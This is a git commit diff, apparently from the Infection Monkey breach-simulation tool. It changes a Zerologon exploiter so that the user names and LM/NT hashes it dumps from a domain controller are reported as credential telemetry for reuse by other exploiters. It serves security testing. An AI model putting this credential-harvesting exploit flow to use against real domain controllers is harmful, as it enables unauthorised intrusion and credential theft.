Agent: Send extracted creds as CredentialTelemetry from Zerologon exploiter
This commit is contained in:
parent
aee3566a0c
commit
040227286a
|
@ -16,11 +16,14 @@ from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
|
|||
from impacket.dcerpc.v5.dtypes import NULL
|
||||
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.credential_collectors import LMHash, NTHash, Username
|
||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
|
||||
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
|
||||
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
|
||||
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
|
||||
from infection_monkey.i_puppet.credential_collection import Credentials
|
||||
from infection_monkey.telemetry.credentials_telem import CredentialsTelem
|
||||
from infection_monkey.utils.capture_output import StdoutCapture
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
@ -36,7 +39,6 @@ class ZerologonExploiter(HostExploiter):
|
|||
|
||||
def __init__(self, host: object):
|
||||
super().__init__(host)
|
||||
self.exploit_info["credentials"] = {}
|
||||
self.exploit_info["password_restored"] = None
|
||||
self._extracted_creds = {}
|
||||
self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
|
||||
|
@ -264,7 +266,7 @@ class ZerologonExploiter(HostExploiter):
|
|||
|
||||
def store_extracted_creds_for_exploitation(self) -> None:
|
||||
for user in self._extracted_creds.keys():
|
||||
self.add_extracted_creds_to_exploit_info(
|
||||
self.send_extracted_creds_as_credential_telemetry(
|
||||
user,
|
||||
self._extracted_creds[user]["lm_hash"],
|
||||
self._extracted_creds[user]["nt_hash"],
|
||||
|
@ -275,18 +277,11 @@ class ZerologonExploiter(HostExploiter):
|
|||
self._extracted_creds[user]["nt_hash"],
|
||||
)
|
||||
|
||||
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
|
||||
# TODO exploit_info["credentials"] is discontinued,
|
||||
# refactor to send a credential telemetry
|
||||
self.exploit_info["credentials"].update(
|
||||
{
|
||||
user: {
|
||||
"username": user,
|
||||
"password": "",
|
||||
"lm_hash": lmhash,
|
||||
"ntlm_hash": nthash,
|
||||
}
|
||||
}
|
||||
def send_extracted_creds_as_credential_telemetry(
|
||||
self, user: str, lmhash: str, nthash: str
|
||||
) -> None:
|
||||
self._telemetry_messenger.send_telemetry(
|
||||
CredentialsTelem([Credentials([Username(user)], [LMHash(lmhash), NTHash(nthash)])])
|
||||
)
|
||||
|
||||
# so other exploiters can use these creds
|
||||
|
|
Loading…
Reference in New Issue